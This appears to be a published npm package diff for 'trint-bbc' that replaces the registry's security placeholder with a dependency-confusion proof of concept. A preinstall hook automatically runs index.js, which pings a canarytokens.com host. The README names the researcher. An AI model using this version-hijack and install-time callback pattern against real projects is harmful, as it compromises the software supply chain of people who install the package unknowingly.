trint-bbc 0.0.1-security → 9.9.0

package/README.md

@@ -1,5 +1,3 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=trint-bbc for more information.
+<h1 align="center">This NPM package vulnerable to dependency confiuse vulnerability</h1>
+<p align="center">Name: Anindya Ghoshal</p>
+<p align="center">Contact: hackwithghoshal@gamil.com</p>

package/index.js

@@ -0,0 +1,29 @@
+// This code just notify me it's trigger
+
+// Importing https module
+const http = require('http');
+
+// Setting the configuration for
+// the request
+const options = {
+	hostname: '5hjrkbihgawg4xogmn7bt5gi5.canarytokens.com',
+	path: '/posts',
+	method: 'GET'
+};
+	
+// Sending the request
+const req = http.request(options, (res) => {
+	let data = ''
+	
+	res.on('data', (chunk) => {
+		data += chunk;
+	});
+	
+	// Ending the response
+	res.on('end', () => {
+		// console.log('Body:', JSON.parse(data))
+	});
+	
+}).on("error", (err) => {
+	// console.log("Error: ", err)
+}).end()

package/package.json

@@ -1,6 +1,12 @@
 {
   "name": "trint-bbc",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "9.9.0",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall" : "node index.js"
+  },
+  "author": "",
+  "license": "ISC"
 }